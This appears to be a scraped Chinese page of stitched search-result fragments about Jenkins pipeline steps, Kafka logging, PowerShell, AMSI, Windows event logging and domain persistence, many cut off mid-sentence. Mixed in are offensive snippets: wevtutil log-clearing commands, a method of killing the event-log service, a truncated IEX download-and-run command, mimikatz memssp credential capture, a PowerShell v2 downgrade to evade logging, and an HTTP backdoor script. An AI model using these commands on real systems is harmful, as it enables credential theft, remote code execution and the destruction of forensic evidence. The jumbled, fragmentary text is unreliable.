writeFile:将内容写入指定文件中 file:文件路径,可以是绝对路径,也可以是相对路径 text:要写入的文件内容 encoding:目标文件的编码。...转码 制品相关步骤 stash:保存临时文件 将文件保存起来,以便同一次构建的其他步骤或阶段使用。 如果整个流水线在同一台机器上执行,那stash是多余的,一般用于跨Jenkins node使用。...encoding:脚本执行后输出日志的编码,默认为系统编码 returnStatus:布尔类型,默认返回状态码,如果是非零则流水线执行失败。...设置为true后,无论什么状态码,流水线执行都不受影响 returnStdout:布尔类型,如果为true,任务的标准输出将作为步骤的返回值,而不是打印到构建日志中(如果有错误,则依旧会打印到日志中)...执行的是PowerShell脚本 支持参数类似sh 其他步骤 error:主动报错,中止pipeline error(“there is a error”) tool:使用预定义的工具 name:工具名称
二.制品相关 存取临时文件 stash步骤可以将一些文件保存起来,以便被同一次构建的其他步骤或阶段使用。如果整个pipeline的所有阶段在同一台机器上执行,则stash步骤是多余的。...excludes:字符串类型,将哪些文件排除。如果排除多个文件,则使用逗号分隔。留空代表不排除任何文件。 includes:字符串类型,stash哪些文件,留空代表当前文件夹下的所有文件。...encoding:脚本执行后输出日志的编码,默认值为脚本运行所在系统的编码。 returnStatus:布尔类型,默认脚本返回的是状态码,如果是一个非零的状态码,则会引发pipeline执行失败。...returnStdout:布尔类型,如果为true,则任务的标准输出将作为步骤的返回值,而不是打印到构建日志中(如果有错误,则依然会打印到日志中)。除了script参数,其他参数都是可选的。...powershell步骤执行的是PowerShell脚本,支持3+版本。这两个步骤支持的参数与sh步骤的一样。
Windows PowerShell v3将伴随着Microsoft Hyper-V 3.0和Windows Server 2012发布。...PowerShell v3采用新的cmdlet让管理员能够更深入到系统进程中,这些进程可以制作成可执行的文件或脚本(script)。...还将改进日志记录,以提供将本地计算机日志发送到远程设备的机制,而不管原始操作系统如何。...,无论记录设置如何 引擎状态从可用状态更改为停止,记录PowerShell活动结束。...无论记录设置如何 PowerShell控制台已准备好进行用户输入 简单的Powershell威胁狩猎 配置完Powershell审核策略后,我们可以进行一次简单的威胁狩猎来验证一下,通过Powershell
kafka中添加日志 你在调试代码的时候,可能想加一点日志观察。...info(s"打一个启动日志..集群id = $clusterId") 日志打印到控制台 默认的log4j.properties文件是没有将日志打印到控制台的,既然我们是调试,那么让日志打印到控制台会更加直观...这个时候改下log4j.properties配置文件就行 将原来的配置 log4j.logger.kafka=INFO 改成 log4j.logger.kafka=INFO, kafkaAppender...,stdout 调试常用脚本命令 可能你想执行kafka的一些脚本,并且进行debug调试....那我们可以通过sh脚本内容太找到最终是调用了哪个类,比如 增删改查 Topic 最终调用的类是 kafka.admin.TopicCommand, 那我们调用这个类的main方法就行了。
该命令将在虚拟机上执行,如果存在到控制台的输出,会把此输出打印到控制台。命令一运行将会自动关闭连接。...使用 New-PSSession 和 Copy-Item 复制文件 注意: PowerShell Direct 仅支持 Windows 版本 14280 及更高版本中的持久性会话 在编写用于跨一个或多个远程计算机协调操作的脚本时...创建会话,然后复制文件: 运行以下命令之一使用 New-PSSession 将持久性 PowerShell 会话创建到虚拟机。...如果不使用 -Credential 标志显式指定凭据,来宾操作系统中的服务将崩溃,并且将需要重新启动。如果你遇到此问题,可在此处获取解决方法说明。 8.2. 将文件复制到虚拟机内。...删除虚拟机 如果您需要删除虚拟机,可以使用以下命令: powershell Remove-VM -Name "TestVM" -Force 该命令将删除名为“TestVM”的虚拟机,包括其配置文件和虚拟硬盘
问题来源:Docker日志文件 Docker作为一种流行的容器化平台,其日志文件记录了容器的运行信息,对于调试和监控应用至关重要。...只需以管理员身份执行下面的PowerShell脚本,即可轻松找出占用空间最大的文件夹或文件: Get-ChildItem -Directory | ForEach-Object { $folder...执行脚本:将上述脚本粘贴到PowerShell窗口中,按Enter执行。 分析结果:脚本执行完成后,会列出当前目录下所有子目录的大小(以GB为单位),并按大小降序排列。...这样,您可以快速识别出占用空间最大的文件夹。 手动清理:根据脚本的输出结果,找到那些占用空间过大的Docker日志文件或其他文件夹,并进行手动清理。...注意事项: 清理日志文件前,请确保这些日志信息对您当前的工作不再重要。 某些日志文件可能需要Docker服务停止后才能删除。
) JavaScript 和 VBScript Office VBA 宏 AMSI的主要是针对无文件落地攻击,比如 powershell 无文件攻击、VBScript脚本,对脚本进行扫描。...AMSI一些可能失效的地方比如:从WMI名字空间、注册表、事件日志等非常规位置加载的脚本、不用 powershell.exe 执行(可用网络策略服务器之类的工具)的 PowerShell 脚本等。...创建 PowerShell 进程后,AMSI.DLL 将从磁盘加载到其地址空间。 在 AMSI.DLL 中,有一个称为 AmsiScanBuffer() 的函数,本质上是用于扫描脚本内容的函数。...4.amsi停止宏执行并从循环缓冲区取出内容传递。 5.amsi从循环缓冲区取出内容传递给杀毒软件。 6.杀毒软件拿到数据后判断宏是否为恶意的。 6.如果行为是无恶意的,那么宏可以执行。...通过 AMSI 发送的行为日志可能包括诸如从中下载恶意数据的可疑 URL、已知与恶意软件相关联的可疑文件名等信息。
PowerShell攻击特性总结: • 无文件攻击特性防查杀,可躲避防火墙、众多反病毒软件和入侵防御系统:PowerShell的无文件特性,使其无需接触磁盘,内存直接加载并执行恶意代码。...防御角度(蓝队视角): 通常PowerShell 2.0事件日志可以提供命令活动或脚本执行的开始和停止时间,加载的提供程序(指示正在使用的功能类型)以及发生活动的用户帐户。...的功能,攻击者也常通过powershell -version 2命令将PowerShell Command-line切换至v2版本去躲避日志记录,有点“降级攻击”的意思。...set-SBLLogSize -MaxSizeMB 1000 Enalbe-SBL 或者通过GPO启用PowerShell脚本块日志记录功能并记录脚本文件的调用信息: ?...PowerShell 5.0包含4.0中未提供的功能,包括可疑的脚本块日志记录。
* @param instanceId id of instance * @return 文件名称 */ protected abstract String getScriptName...= null) { sb.append(line); // 同步到在线日志 omsLogger.info(line...sb.append("Exception: ").append(e); } }copyStream会读取InputStream到StringBuilder,同时打印到...PowerShellProcessor、PythonProcessor;它定义了getScriptName、getRunCommand抽象方法;其process0方法主要是把scriptParams写入到本地文件...scriptParams是http、https、ftp的则根据url进行下载),然后修改权限为755,然后执行pb.start(),再将input及errorStream收集到StringBuilder并打印到
PowerShell攻击特性总结: 无文件攻击特性防查杀,可躲避防火墙、众多反病毒软件和入侵防御系统:PowerShell的无文件特性,使其无需接触磁盘,内存直接加载并执行恶意代码。...防御角度(蓝队视角): 在执行任何PowerShell命令或脚本时,无论是本地还是通过远程处理,Windows都可以将事件写入以下三个日志文件: • Windows PowerShell.evtx •...• Microsoft-Windows-WinRM/Analytic.etl 通常PowerShell 2.0事件日志可以提供命令活动或脚本执行的开始和停止时间,加载的提供程序(指示正在使用的功能类型...set-SBLLogSize -MaxSizeMB 1000 Enalbe-SBL 或者通过GPO启用PowerShell脚本块日志记录功能并记录脚本文件的调用信息: image.png 当然也可以通过修改以下注册表选项来开启...PowerShell 5.0包含4.0中未提供的功能,包括可疑的脚本块日志记录。
Windows日志 日志主要包括五个类别: 应用程序 安全 Setup 系统 转发 日志文件均存放在C:\Windows\System32\winevt\Logs, 在文件夹中上图的各个选项分别有一个日志文件....evtx, 而Microft则是有多个日志文件 使用powershell查看所有应用程序的日志: powershell.exe -c "Get-WinEvent -FilterHashtable @{...#清除系统日志 wevtutil cl application #清除引用日志 wevyuyil cl "windows powershell" #清除powershell日志 上面几个是比较需要关注的日志...提供的命令 查看时间日志 run event_manager -i 删除事件日志 run event_manager -c 停止日志记录 利用脚本让日志功能失效, 无法记录日志 第一种方法就是通过powershell...脚本工具直接将日志记录的进程给kill掉, 从而使得日志记录失效 powershell.exe "IEX(new-object system.net.webclient).downloading String
如果需要在pipeline中进行逻辑判断或者写Groovy脚本代码,需要写在script步骤中,如下: pipeline { agent any stages { stage('example...} } } } } } 绝大多数时候没有必要写script,建议都提取到不同的stage或使用共享库 pipeline内置了一些step 文件相关的有...),encoding(执行后输出日志的编码),returnStatus(布尔类型,默认返回的是状态码,如果是一个非0的状态码,则会引发pipeline执行失败。...如果returnStatus参数为true,则无论状态码是什么,pipeline的执行不受影响),returnStdout(布尔类型,如果为true,则任务的标准输出将作为步骤的返回值,而不是打印到构建日志中...) returnStatus 和 returnStdout 参数一般不会同时使用,因为返回值只能有一个,如果同时存在则只有returnStatus生效 bat 和 powershell 在Windows
* @param instanceId id of instance * @return 文件名称 */ protected abstract String getScriptName...= null) { sb.append(line); // 同步到在线日志 omsLogger.info(...sb.append("Exception: ").append(e); } } copyStream会读取InputStream到StringBuilder,同时打印到...PowerShellProcessor、PythonProcessor;它定义了getScriptName、getRunCommand抽象方法;其process0方法主要是把scriptParams写入到本地文件...scriptParams是http、https、ftp的则根据url进行下载),然后修改权限为755,然后执行pb.start(),再将input及errorStream收集到StringBuilder并打印到
启动一个已停止的服务。 • Stop-Service。停止一个正在运行的服务。 • Suspend-Service。挂起一个服务。 2、日志 • Get-EventLog。...显示某个事件日志里的事件。 • Clear-EventLog。删除某个事件日志里的所有记录。 • Limit-EventLog。设置事件日志的区间和文件大小限制。 • New-EventLog。...停止某个进程。 • Wait-Process。在接受输入之前等待某个进程停止。 • Debug-Process。附加一个debugger 到某个或某些正在运行的进程上。...安装路径下的Modules文件夹。...可以用New-Item 创建文件夹、网站、应用池、虚拟目录,或者用 Remove-Item 进行删除。
-ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname} (3)利用脚本停止日志的记录 通过该脚本遍历事件日志服务进程...因此,系统将无法收集日志,同时事件日志服务似乎正在运行。...%\inetpub\logs\LogFiles\W3SVC1\ 清除WWW日志: 停止服务:net stop w3svc 删除日志目录下所有文件:del *.* 启用服务:net start w3svc...(2)Cipher 命令多次覆写 在删除文件后,可以利用Cipher 命令通过 /W 参数可反复写入其他数据覆盖已删除文件的硬盘空间,彻底删除数据防止被恢复。...04、清除远程桌面连接记录 当通过本机远程连接其他客户端或服务器后,会在本机存留远程桌面连接记录。代码保存为clear.bat文件,双击运行即可自动化清除远程桌面连接记录。
1.使用mimikatz打开 privilege::debug misc::memssp 2.登录当前用户日志。输入用户名和密码后登录,获取明文密码,密码存储在文件。...在Security Packages下添加mimilib.dll 3、重启系统 域控重启后在c:\windows\system32可看到新生成的文件kiwissp.log,里面含用户名和密码。...如果将域中域的用户迁移到 B 域中,那么在 B域中新建的 SID 会唤醒一个用户影响迁移后用户的权限,导致迁移后无法访问用户本来的资源。...HTTP-Backdoor脚本 此脚本可以帮助攻击者在目标主机上下载和执行Powershell脚本,接收来自第三方网站的指令,在内存中执行PowerShell脚本,其语法如下。...-Time: 设置脚本执行的时间,例如“-Time 23:21”。-CheckURL:检测一个指定的URL里是否存在StopString给出的字符串,如果存在就停止执行。 4.
wmic 脚本下载地址:https://www.fuzzysecurity.com/scripts/files/wmic_info.rar 直接将脚本在目标主机上运行,运行结束后会生成一个 output.html...文件 ?...MSF 是全平台的,无论是win,linux,mac都可以打,但 Empire 是只针对 Windows 的 MSF 集信息收集,渗透,后渗透,木马,社工的功能为一体,全面多能;而 Empire 专注于内网渗透...,它是针对 PowerShell 的 当使用 Empire 使主机上线后,可调用powershell/situational_awareness/host/winenum模块查看本机用户信息、系统基本信息...调用powershell/situational_awareness/host/computerdetails模块可查看更丰富的信息,比如RDP登录信息、主机时间日志等等,在运行这个模块时需要管理员权限
本系列文章前文欣赏: (1):通过rsyslog搭建集中日志服务器 (2):使用ELK实时分析SSH暴力破解 Winlogbeat 使用Winlogbeat将Windows事件日志流传输到Elasticsearch...Winlogbeat 通过标准的 windows API 获取 windows 系统日志,常见的有 Application,Security 、System三个核心日志文件。...2、安装Winlogbeat服务 以管理员身份打开PowerShell,在PowerShell提示符下,运行以下命令以安装服务。...\install-service-winlogbeat.ps1 如果在系统上禁用了脚本执行,则需要为当前会话设置执行策略以允许脚本运行。...#protocol: "https" #username: "elastic" #password: "changeme" 填写要输出到es的地址,保存配置文件后,使用以下命令检查配置文件的正确性
linux 中的部分目录解析 /dev/ 设备目录 /etc/ 配置文件以及服务启动的目录 /proc/ 显示内核以及进程信息虚拟文件系统 /tmp 临时文件目录 /var 变化目录一般是日志文件的目录.../home/家目录 /usr 用户程序及数据帮助文件等目录 /bin 和 /sbin /usr/bin /usr/sbin 用户的命令 /etc/profile 系统全局变量的配置层叠...v模式启动的脚本 /etc/exports //设定NFS网络文件 的系统用的配置文件 /etc/xinit.d //如果服务器是通过xinetd模式运行的,脚本要放在这个目录下 /...) [s#用于替换的内容#替换的内容#g] /查找文件内容/[p打印到页面][d删除查找的文件内容] 文件路径 /dev/ 设备目录 /etc/ 配置文件以及服务启动的目录 /proc.../ 显示内核以及进程信息虚拟文件系统 /tmp 临时文件目录 /var 变化目录一般是日志文件的目录 /home/家目录 /usr 用户程序及数据帮助文件等目录 /bin 和 /sbin
收集的脚本: 1、运行方法: 1、将WindowsCheck.zip压缩包解压到随意一个位置; 2、Windows 2012 (含)以上版本双击Run_WindowsCheck.bat运行(主要是要调用...powershell 3.0或以上,版本不对可能有些命令执行不了); 3、脚本运行完成后会在脚本目录下生成Check_Report_Date.html文件及C:\check_health\system.evtx...,security.evtx,app.evtx,setup.evtx四个日志文件; 4、生成的这5个文件即是这台机器的收集的信息,其中最主要的是Check_Report_Date.html。...2、主要实现的功能: 收集OS基本配置,通过调用powershell模块获取系统配置信息(内存,CPU,网卡,磁盘等基础配置信息) 采集OS的系统、应用、更新及安全日志文件; 通过注册表信息获取OS系统已经安装的软件列表...; 获取系统已经更新的补丁包安装信息; 收集当前系统的网络连接信息; 收集系统开启的、禁用的、停止的服务列表; 收集系统运行的进程使用信息。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
腾讯会议
云直播
对象存储
